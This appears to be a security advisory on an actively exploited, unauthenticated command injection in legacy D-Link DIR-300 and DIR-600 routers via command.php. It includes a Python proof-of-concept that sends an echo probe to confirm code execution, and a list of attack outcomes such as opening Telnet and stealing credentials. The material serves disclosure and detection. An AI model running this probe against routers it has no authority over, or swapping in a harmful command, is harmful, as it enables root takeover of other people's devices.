Actively Exploited in the Wild

This vulnerability is being actively exploited in the wild.

D-Link Legacy Routers OS Command Injection Vulnerability Allowing Unauthenticated Remote Code Execution

Vulnerability

A command injection vulnerability affects various legacy D-Link routers, specifically the DIR-300 rev B (firmware versions through 2.13) and the DIR-600 (firmware versions through 2.14b01). The command.php endpoint of the web interface accepts a cmd parameter without any authentication and passes its value to the system shell without validation. Anyone who can reach the web interface, whether a LAN client or, if remote management is enabled, a host on the WAN side, can therefore execute arbitrary shell commands as root and take over the device completely. Exploitation could involve starting a Telnet service for persistent access, extracting stored credentials, altering the system configuration, or causing a denial of service by crashing the device's web server.

Impact

Successful exploitation allows unauthenticated remote code execution with root privileges on the affected router; no credentials are required.

Reproduction

To reproduce the issue, send an HTTP POST request to the command.php endpoint with the command to run in the cmd parameter, either with curl or with the Metasploit module written for this flaw. The output of the injected command is returned in the HTTP response, so a successful run can be confirmed by checking the response for that output.
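A minimal, benign check for the behaviour described above, as an added example that is not part of the original advisory or of any D-Link or Metasploit code. Only the endpoint path (command.php) and the parameter name (cmd) come from the advisory; the base URL, the random marker and the `echo` with an empty-string split in the middle of the marker are assumptions of this example. The split matters: a page that merely reflects the submitted parameter would contain `abc""def`, while only a shell that actually executed the command returns the joined string `abcdef`, so the check does not false-positive on reflection.

```python
import secrets
import urllib.parse
import urllib.request

ENDPOINT = "/command.php"   # endpoint named in the advisory
PARAM = "cmd"               # parameter named in the advisory


def build_probe(base_url, marker=None):
    """Build the POST for a harmless probe.

    Returns (url, urlencoded_body, expected_marker). The command is
    `echo <first-half>""<second-half>`; the shell concatenates the two halves
    and an empty string, so the full marker appears in the output only when
    the command really ran (this split trick is an assumption of the example).
    """
    marker = marker or secrets.token_hex(6)
    half = len(marker) // 2
    cmd = f'echo {marker[:half]}""{marker[half:]}'
    url = base_url.rstrip("/") + ENDPOINT
    body = urllib.parse.urlencode({PARAM: cmd})
    return url, body, marker


def executed(response_text, marker):
    """True only if the joined marker is present, i.e. the shell ran echo."""
    return marker in response_text


def probe(base_url, timeout=5):
    """Send the probe to a live device and report whether the command ran."""
    url, body, marker = build_probe(base_url)
    req = urllib.request.Request(
        url,
        data=body.encode(),
        method="POST",
        headers={"Content-Type": "application/x-www-form-urlencoded"},
    )
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        text = resp.read().decode("utf-8", "replace")
    return executed(text, marker)


# Constructed sample responses for offline use (not captured from a device).
REFLECTED_ONLY = 'cmd=echo abc""def'    # input echoed back, command not run
EXECUTED = "abcdef\n"                    # shell output of the joined marker

if __name__ == "__main__":
    url, body, marker = build_probe("http://192.168.0.1", "abcdef")
    print(url, body)
    print("reflected only ->", executed(REFLECTED_ONLY, marker))
    print("executed       ->", executed(EXECUTED, marker))
```

`probe()` is the only function that touches the network; everything else runs offline so the encoding and the marker logic can be checked before pointing it at a device you are authorised to test.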

Added: Aug 1, 2025, 9:42 PM
Updated: Aug 1, 2025, 9:42 PM

Vulnerability Rating

Custom Algorithm
spread: 6.8
impact: 7.5
exploitability: 9.4
remediation: 8.3
relevance: 0.3
threat: 9.5
urgency: 2.9
incentive: 9.2

Our algorithm analyzes dozens of metrics to produce these eight vulnerability categories, which are then combined into the overall risk score.